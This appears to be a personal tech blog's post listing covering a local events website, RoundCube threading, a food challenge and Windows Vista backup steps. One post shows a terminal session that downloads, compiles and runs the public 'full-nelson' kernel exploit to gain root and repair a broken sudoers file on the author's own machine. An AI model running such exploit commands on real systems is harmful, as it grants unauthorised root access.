New Website: wintots.co.uk – What’s On in Winchester for Pre-Schoolers 0 – 5

My new website has just gone live: wintots.co.uk – What’s On in Winchester for Pre-Schoolers 0 – 5.
In in its initial incarnation its just three pages: a static home page, browse/search the database with drill-down and a details page.
I used SQLite for the database rather than MySQL as might be expected. It may come back to bite me but it seems to be working well so far. The database is created locally from a CSV file using a custom conversion program that also massages the data a little. The entire site can therefore be uploaded using an FTP transfer since an SQLite database is just a normal file – no need to run any SQL on the live site to create/update the database.
There’s one small JavaScript snippet on the browse page, but other than that the site is firmly Web 1.0. There’s plenty of scope to convert to AJAX later but I’m not convinced its necessary. Using SQLite rather than MySQL means pages load fast enough (well, under light load at least).
This is the first web site I’ve made where I’ve had to take portable devices into account. There seem to be numerous iPod/iPad simulators out there, none of which are much cop, so I’ll have to track down someone with a real device to check it.

Local Privilege Escalation Exploits FTW!

cjanuary@gumtree:~$ sudo vim /etc/sudoers
>>> /etc/sudoers: syntax error near line 14 <<<
sudo: parse error in /etc/sudoers near line 14
sudo: no valid sudoers sources found, quitting
cjanuary@gumtree:~$ wget -O - http://dl.packetstormsecurity.net/1012-exploits/full-nelson.c | tail -n +13 >full-nelson.c
cjanuary@gumtree:~$ gcc full-nelson.c -o full-nelson
cjanuary@gumtree:~$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xffffffffa0efa510
 [+] Resolved econet_ops to 0xffffffffa0efa600
 [+] Resolved commit_creds to 0xffffffff8108aee0
 [+] Resolved prepare_kernel_cred to 0xffffffff8108b2c0
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
sh-4.1# whoami
root
sh-4.1# vim /etc/sudoers

Message Threading for RoundCube Webmail

I’ve been planning on moving my e-mail from Google Mail to my new PC router so I’ve been looking for a web mail solution that supports similar features to Google Mail. I chose RoundCube WebMail because it has a clean user interface and, like Google Mail, it uses AJAX, which make it more responsive. I’ve used my fair share of Web 1.0 web mail clients in the past and don’t really want to go there again.
One of the must-have features for any e-mail client that I use is threading since I am subscribed to a number of mailing lists and get a high volume of e-mails each day. Unfortunately RoundCube doesn’t have this feature and when I looked at the road map I could see it wasn’t scheduled for the near future.
So I decided to bite the bullet and work on adding message threading to RoundCube myself.
See my progress so far

15 Pound Food Challenge

My wife and I have set ourself the challenge of feeding ourselves for a week on only £15. Head over to the blog to see how we got on!
porridgeandjam.blogspot.com

Bare Metal Disaster Recovery for Windows Vista Home: Caveats

When you backup your system using this technique the system is backed up in a crash-consistent state. When you restore from the backup it’s like someone yanked the power cord out of your computer at the time you started the backup. The file system used in Windows Vista Home (NTFS) can cope with that so for the most part your files will be ok but some programs may not (e.g. they might have been halfway through writing a file).
It’s also important to note that robocopy does not copy NTFS junction points. This is normally harmless but it can stop some older, poorly written programs from working.
(more…)

Bare Metal Disaster Recovery for Windows Vista Home: Scheduled Backups

You can schedule the backup script to run on a regular basis, e.g. once a week.
(more…)

Bare Metal Disaster Recovery for Windows Vista Home: How To Restore On To An Existing Hard Disk

Firstly, if you do not have the Windows Vista Setup CD:

  1. First try pressing F8 when your computer is botting. If the Advanced Boot Options screen appears select Repair your Computer. Skip steps 1-5 below.
  2. If the Repair your Computer option is not shown or you cannot get to the Advanced Boot Options screen, visit this website: http://www.howtogeek.com/howto/windows-vista/how-to-make-a-windows-vista-repair-disk-if-you-dont-have-one/

(more…)

Bare Metal Disaster Recovery for Windows Vista Home: How To Restore On To Bare Metal

How to restore your system onto a new hard disk (in the event your old one dies).
(more…)

Bare Metal Disaster Recovery for Windows Vista Home: How to Backup

  1. Create a directory to contain the programs required to perform a backup (e.g. call it Backup).
  2. Copy vshadow.exe and dosdev.exe to that directory.
  3. Create a file called backup.cmd with the following contents:

(more…)

Bare Metal Disaster Recovery for Windows Vista Home: Where To Get The Tools

robocopy is included with Windows Vista Service Pack 1- older versions won’t work.
Vista Service Pack 1 may be downloaded from here: http://technet.microsoft.com/en-us/windowsvista/bb738089.aspx
vshadow is included in the Microsoft SDK
The Microsoft SDK may be downloaded from here: http://www.microsoft.com/downloads/details.aspx?FamilyId=E6E1C3DF-A74F-4207-8586-711EBE331CDC&displaylang=en. You need to install at least the Win32 Development Tools. vshadow.exe may be found in C:\Program Files\Microsoft SDKs\Windows\v6.1\Bin\vsstools.
You also need another program, dosdev, which allows you to mount a Volume Shadow Copy as a normal drive with a drive letter.
dosdev may be found in Microsoft Product Support’s Reporting Tools, specifically MPSRPT_CLUSTER.EXE. That file may be downloaded from here: http://www.microsoft.com/downloads/details.aspx?familyid=cebf3c7c-7ca5-408f-88b7-f9c79b7306c0&displaylang=en. Do not run MPSRPT_CLUSTER.EXE when you download it. Instead open the file with 7-zip and extract dosdev.exe.